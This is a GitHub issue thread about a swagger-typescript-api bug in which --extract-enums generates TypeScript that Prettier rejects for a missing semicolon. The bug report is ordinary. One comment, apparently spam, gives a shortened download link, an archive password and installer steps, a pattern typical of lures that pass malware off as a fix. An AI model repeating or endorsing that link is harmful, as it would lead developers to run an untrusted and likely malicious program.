### ISSUE TITLE
[Bug] Parser option --extract-enums fails to generate due to linting error in version 12.0.4

### ISSUE THREAD

**Issue by MiracleUFO** [acacode/swagger-typescript-api#907]
Generating types with options `--union-enums --extract-enums` throws this error and TS file is not generated for a specific openapi.yml file. I cannot remove` --extract-enums` as it's part of our configuration for the whole app. 

I believe a terminating semicolon is not added by [swagger-typescript-api](https://github.com/acacode/swagger-typescript-api)@12.0.4 causing this **error** to be thrown it attempts when format with prettier:

```
SyntaxError: ';' expected. (1604:10)
  1602 |  * @example "payout_interest"
  1603 |  */
> 1604 |   export type DepositInterestTreatment = "capitalize_interest" | "payout_interest"
       |          ^
  1605 |
  1606 |   /**
  1607 |  * Current state of the deposit.
    at Ve (~/.npm/_npx/40e7642a532d5314/node_modules/prettier/parser-typescript.js:1:15607)
    at vz (~/.npm/_npx/40e7642a532d5314/node_modules/prettier/parser-typescript.js:280:5919)
    at Object.yz [as parse] ~/.npm/_npx/40e7642a532d5314/node_modules/prettier/parser-typescript.js:280:6242)
```

**Comment by MiracleUFO** [comment]
Related to [https://github.com/acacode/swagger-typescript-api/issues/470](https://github.com/acacode/swagger-typescript-api/issues/470)

I do not want to upgrade to ^13.0.0 because when I used it last I got a circular dependency error and had to downgrade.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by smorimoto** [comment]
Please reopen if you are still experiencing this issue with the latest release.
